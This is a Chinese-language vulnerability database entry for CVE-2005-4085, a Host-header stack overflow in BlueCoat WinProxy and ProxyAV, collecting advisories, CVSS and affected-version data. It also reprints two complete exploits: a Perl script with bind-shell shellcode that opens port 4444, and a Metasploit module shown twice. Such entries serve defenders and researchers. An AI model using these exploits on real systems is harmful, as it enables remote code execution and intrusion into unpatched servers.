CVE-2005-4085
CVSS7.5
发布时间 :2005-12-31 00:00:00
修订时间 :2011-03-07 21:27:40
NMCOEPS    

[原文]Buffer overflow in BlueCoat (a) WinProxy before 6.1a and (b) the web console access functionality in ProxyAV before 2.4.2.3 allows remote attackers to execute arbitrary code via a long Host: header.


[CNNVD]Blue Coat Systems WinProxy Host头部请求字段远程溢出漏洞(CNNVD-200512-996)

        BlueCoat WinProxy是适用于中小业务的Internet共享代理服务器。
        WinProxy中对请求头部字段的处理存在远程溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。攻击者可以通过向Web代理服务发送超长的Host:字符串来触发这个漏洞,覆盖帧的SEH处理器控制EIP。成功利用这个漏洞的攻击者可以远程执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:bluecoat:webproxy:4.0:r1hBlue Coat Systems WebProxy 4.0 R1h
cpe:/a:bluecoat:webproxy:5.0:r1bBlue Coat Systems WebProxy 5.0 R1b
cpe:/a:bluecoat:webproxy:5.0:r1cBlue Coat Systems WebProxy 5.0 R1c
cpe:/a:bluecoat:webproxy:4.0:r1eBlue Coat Systems WebProxy 4.0 R1e
cpe:/a:bluecoat:webproxy:5.1:r1dBlue Coat Systems WebProxy 5.1 R1d
cpe:/a:bluecoat:webproxy:5.1:r1aBlue Coat Systems WebProxy 5.1 R1a
cpe:/a:bluecoat:webproxy:6.0:r1cBlue Coat Systems WebProxy 6.0 R1c
cpe:/a:bluecoat:webproxy:4.0:r1bBlue Coat Systems WebProxy 4.0b
cpe:/h:bluecoat:proxyavBlue Coat Systems ProxyAV
cpe:/a:bluecoat:webproxy:4.0:r1kBlue Coat Systems WebProxy 4.0 R1k
cpe:/a:bluecoat:webproxy:5.1:r1eBlue Coat Systems WebProxy 5.1 R1e
cpe:/a:bluecoat:webproxy:4.0:r1mBlue Coat Systems WebProxy 4.0 R1m
cpe:/a:bluecoat:webproxy:4.0:r1pBlue Coat Systems WebProxy 4.0 R1p
cpe:/a:bluecoat:webproxy:4.0:r1fBlue Coat Systems WebProxy 4.0 R1f
cpe:/a:bluecoat:webproxy:5.0:r1aBlue Coat Systems WebProxy 5.0 R1a
cpe:/a:bluecoat:webproxy:4.0:r1aBlue Coat Systems WebProxy 4.0a
cpe:/a:bluecoat:webproxy:4.0:r1nBlue Coat Systems WebProxy 4.0 R1n
cpe:/a:bluecoat:webproxy:6.0:r1aBlue Coat Systems WebProxy 6.0 R1a
cpe:/a:bluecoat:webproxy:4.0:r1cBlue Coat Systems WebProxy 4.0c
cpe:/a:bluecoat:webproxy:5.2:r1aBlue Coat Systems WebProxy 5.2 R1a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4085
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4085
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-996
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/16147
(PATCH)  BID  16147
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
(VENDOR_ADVISORY)  IDEFENSE  20060105 Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability
http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
(VENDOR_ADVISORY)  CONFIRM  http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
http://securitytracker.com/id?1015441
(VENDOR_ADVISORY)  SECTRACK  1015441
http://secunia.com/advisories/18909
(VENDOR_ADVISORY)  SECUNIA  18909
http://secunia.com/advisories/18288
(VENDOR_ADVISORY)  SECUNIA  18288
http://www.vupen.com/english/advisories/2006/0622
(UNKNOWN)  VUPEN  ADV-2006-0622
http://www.vupen.com/english/advisories/2006/0065
(UNKNOWN)  VUPEN  ADV-2006-0065

- 漏洞信息

Blue Coat Systems WinProxy Host头部请求字段远程溢出漏洞
高危 缓冲区溢出
2005-12-31 00:00:00 2006-06-05 00:00:00
远程  
        BlueCoat WinProxy是适用于中小业务的Internet共享代理服务器。
        WinProxy中对请求头部字段的处理存在远程溢出漏洞,远程攻击者可能利用此漏洞在服务器上执行任意指令。攻击者可以通过向Web代理服务发送超长的Host:字符串来触发这个漏洞,覆盖帧的SEH处理器控制EIP。成功利用这个漏洞的攻击者可以远程执行任意代码。
        

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://download.winproxy.com/downloads/WinProxy.exe

- 漏洞信息 (1408)

BlueCoat WinProxy 6.0 R1c (Host) Remote Stack/SEH Overflow Exploit (EDBID:1408)
windows remote
2006-01-07 Verified
80 FistFuXXer
N/A [点击下载]
#!perl
#
# "WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit
#
# Author:  FistFucker (aka FistFuXXer)
# e-Mail:  FistFuXXer@gmx.de
#
#
# Advisory:
# http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
#
# CVE info:
# CAN-2005-4085
#

use IO::Socket;

#
# destination IP address
#
$ip = '127.0.0.1';

#
# destination TCP port
#
$port = 80;

#
# SE handler. 0x00, 0x0a, 0x0d free
#
$seh = reverse( "\x01\x03\x12\x40" );  # POP/POP/RET
                                       # PAVDLL.01031240

#
# JMP SHORT to shellcode. 0x00, 0x0a, 0x0d free
#
$jmp = "\x90\x90\xeb\x32";             # [NOP][NOP][JMP|JMP]

#
# 0x00, 0x0a, 0x0d free shellcode
#
# win32_bind -  EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
#
$sc = "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x26".
      "\x8c\x6d\xa3\x83\xeb\xfc\xe2\xf4\xda\xe6\x86\xee\xce\x75\x92\x5c".
      "\xd9\xec\xe6\xcf\x02\xa8\xe6\xe6\x1a\x07\x11\xa6\x5e\x8d\x82\x28".
      "\x69\x94\xe6\xfc\x06\x8d\x86\xea\xad\xb8\xe6\xa2\xc8\xbd\xad\x3a".
      "\x8a\x08\xad\xd7\x21\x4d\xa7\xae\x27\x4e\x86\x57\x1d\xd8\x49\x8b".
      "\x53\x69\xe6\xfc\x02\x8d\x86\xc5\xad\x80\x26\x28\x79\x90\x6c\x48".
      "\x25\xa0\xe6\x2a\x4a\xa8\x71\xc2\xe5\xbd\xb6\xc7\xad\xcf\x5d\x28".
      "\x66\x80\xe6\xd3\x3a\x21\xe6\xe3\x2e\xd2\x05\x2d\x68\x82\x81\xf3".
      "\xd9\x5a\x0b\xf0\x40\xe4\x5e\x91\x4e\xfb\x1e\x91\x79\xd8\x92\x73".
      "\x4e\x47\x80\x5f\x1d\xdc\x92\x75\x79\x05\x88\xc5\xa7\x61\x65\xa1".
      "\x73\xe6\x6f\x5c\xf6\xe4\xb4\xaa\xd3\x21\x3a\x5c\xf0\xdf\x3e\xf0".
      "\x75\xdf\x2e\xf0\x65\xdf\x92\x73\x40\xe4\x7c\xff\x40\xdf\xe4\x42".
      "\xb3\xe4\xc9\xb9\x56\x4b\x3a\x5c\xf0\xe6\x7d\xf2\x73\x73\xbd\xcb".
      "\x82\x21\x43\x4a\x71\x73\xbb\xf0\x73\x73\xbd\xcb\xc3\xc5\xeb\xea".
      "\x71\x73\xbb\xf3\x72\xd8\x38\x5c\xf6\x1f\x05\x44\x5f\x4a\x14\xf4".
      "\xd9\x5a\x38\x5c\xf6\xea\x07\xc7\x40\xe4\x0e\xce\xaf\x69\x07\xf3".
      "\x7f\xa5\xa1\x2a\xc1\xe6\x29\x2a\xc4\xbd\xad\x50\x8c\x72\x2f\x8e".
      "\xd8\xce\x41\x30\xab\xf6\x55\x08\x8d\x27\x05\xd1\xd8\x3f\x7b\x5c".
      "\x53\xc8\x92\x75\x7d\xdb\x3f\xf2\x77\xdd\x07\xa2\x77\xdd\x38\xf2".
      "\xd9\x5c\x05\x0e\xff\x89\xa3\xf0\xd9\x5a\x07\x5c\xd9\xbb\x92\x73".
      "\xad\xdb\x91\x20\xe2\xe8\x92\x75\x74\x73\xbd\xcb\x58\x54\x8f\xd0".
      "\x75\x73\xbb\x5c\xf6\x8c\x6d\xa3";


print '"WinProxy 6.0 R1c" Remote Stack/SEH Overflow Exploit'."\n\n";

$sock = IO::Socket::INET->new
(

    PeerAddr => $ip,
    PeerPort => $port,
    Proto    => 'tcp',
    Timeout  => 2

) or print '[-] Error: Could not establish a connection to the server!' and exit(1);

print "[+] Connected.\n";
print "[+] Trying to overwrite SE handler...\n";

$sock->send( "GET / HTTP/1.0\r\n" );
$sock->send( 'Host: 127.0.0.1:'. "\x90" x 23 . $jmp . $seh . "\x90" x 50 . $sc ."\r\n\r\n" );

print "[+] Done. Now check for bind shell on $ip:4444!";

close($sock);

# milw0rm.com [2006-01-07]
		

- 漏洞信息 (16691)

Blue Coat WinProxy Host Header Overflow (EDBID:16691)
windows remote
2010-07-12 Verified
80 metasploit
N/A [点击下载]
##
# $Id: bluecoat_winproxy_host.rb 9797 2010-07-12 23:25:31Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GreatRanking

	HttpFingerprint = { :method => 'HEAD', :pattern => [ /BlueCoat/ ] }

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Blue Coat WinProxy Host Header Overflow',
			'Description'    => %q{
					This module exploits a buffer overflow in the Blue Coat Systems WinProxy
				service by sending a long port value for the Host header in a HTTP
				request.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9797 $',
			'References'     =>
				[
					['CVE', '2005-4085'],
					['OSVDB', '22238'],
					['BID', '16147'],
					['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Jan 5 2005',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(80)
			], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET / HTTP/1.1" + "\r\n"
		sploit += "Host: 127.0.0.1:"
		sploit += rand_text_english(31, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[23, seh.length] = seh
		sploit += "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83192)

Blue Coat WinProxy Host Header Overflow (PacketStormID:F83192)
2009-11-26 00:00:00
MC  metasploit.com
exploit,web,overflow
CVE-2005-4085
[点击下载]

This Metasploit module exploits a buffer overflow in the Blue Coat Systems WinProxy service by sending a long port value for the Host header in a HTTP request.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::Seh

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Blue Coat WinProxy Host Header Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in the Blue Coat Systems WinProxy
				service by sending a long port value for the Host header in a HTTP
				request.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2005-4085'],
					['OSVDB', '22238'],
					['BID', '16147'],
					['URL', 'http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html'],

				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'WinProxy <= 6.1 R1a Universal', { 'Ret' => 0x6020ba04 } ], # Asmdat.dll
				],

			'Privileged'     => true,

			'DisclosureDate' => 'January 5 2005',

			'DefaultTarget' => 0))

			register_options(
				[
						Opt::RPORT(80)
				], self.class)

	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")

		sploit  = "GET / HTTP/1.1" + "\r\n" 
		sploit += "Host: 127.0.0.1:"
		sploit += rand_text_english(31, payload_badchars)
		seh  = generate_seh_payload(target.ret)
		sploit[23, seh.length] = seh
		sploit += "\r\n\r\n"

		sock.put(sploit)
		sock.get_once(-1, 3)
		
		handler
		disconnect
	end

end
    

- 漏洞信息 (F42864)

iDEFENSE Security Advisory 2006-01-05.2 (PacketStormID:F42864)
2006-01-08 00:00:00
iDefense Labs,Manuel Santamarina Suarez  idefense.com
advisory,remote,web,overflow,arbitrary
CVE-2005-4085
[点击下载]

iDefense Security Advisory 01.05.06 - Remote exploitation of a buffer overflow vulnerability in Blue Coat Systems Inc.'s WinProxy allows for the remote execution of arbitrary code by attackers. The vulnerability can be triggered by sending an overly long Host: string to the web proxy service.

Blue Coat Systems WinProxy Host Header Stack Overflow Vulnerability

iDefense Security Advisory 01.05.06
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=364
January 05, 2006

I. BACKGROUND

BlueCoat WinProxy is an Internet sharing proxy server designed for small
to medium businesses. In addition to Internet sharing Winproxy also
hosts a series of security, anti-spam and anti-spyware capabilities.

More information can be located from the vendors site at:

  http://www.winproxy.com/

II. DESCRIPTION

Remote exploitation of a buffer overflow vulnerability in Blue Coat
Systems Inc.'s WinProxy allows for the remote execution of arbitrary
code by attackers.
 
The vulnerability can be triggered by sending an overly long Host:
string to the web proxy service.

III. ANALYSIS

Exploitation of this vulnerability is trivial. An overly long header
directly overwrites the SEH handler for the frame allowing for control
over EIP.

IV. DETECTION

iDefense has confirmed this vulnerability in WinProxy 6.0. All previous
versions are suspected to be vulnerable.

V. WORKAROUND

Disabling the WinProxy web proxy protocol will prevent this attack.

VI. VENDOR RESPONSE

Blue Coat has released WinProxy 6.1a to address this vulnerability.

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2005-4085 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

12/07/2005  Initial vendor notification
12/08/2005  Initial vendor response
01/05/2006  Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by FistFuXXer.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

Free tools, research and upcoming events
http://labs.idefense.com

X. LEGAL NOTICES

Copyright     

- 漏洞信息

22238
Blue Coat WinProxy / ProxyAV Host Header Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Coordinated Disclosure

- 漏洞描述

A buffer overflow exists in WinProxy and ProxyAV. The web server fails to validate Host header data resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-01-05 2005-12-07
2006-01-07 2006-01-05

- 解决方案

Upgrade to version 6.1a or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds

- 相关参考

- 漏洞作者

- 漏洞信息

Blue Coat Systems WinProxy Remote Host Header Buffer Overflow Vulnerability
Boundary Condition Error 16147
Yes No
2006-01-05 12:00:00 2007-11-15 12:37:00
FistFuXXer discovered this vulnerability.

- 受影响的程序版本

Blue Coat Systems WebProxy 6.0
Blue Coat Systems ProxyAV
Blue Coat Systems WebProxy 6.1 a
Blue Coat Systems ProxyAV 2.4.2

- 不受影响的程序版本

Blue Coat Systems WebProxy 6.1 a
Blue Coat Systems ProxyAV 2.4.2

- 漏洞讨论

A remote buffer-overflow vulnerability affects Blue Coat Systems WinProxy because the application fails to properly validate the length of user-supplied strings before copying them into static process buffers.

An attacker may exploit this issue to execute arbitrary code with the privileges of the vulnerable application. This may facilitate unauthorized access or privilege escalation.

Blue Coat Systems WinProxy 6.0 is vulnerable to this issue; other versions may also be affected.

Blue Coat Systems ProxyAV is also affected by this issue.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The 'CAN-2005-4085_exploit.pl' exploit is provided by FistFucker <FistFuXXer@gmx.de>.

The 'bluecoat_winproxy.pm' Metasploit Framework exploit is provided by y0 <y0@w00t-shell.net>.

- 解决方案

The vendor has released WinProxy 6.1a and ProxyAV 2.4.2.3 to address this and other issues.


Blue Coat Systems WebProxy 6.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站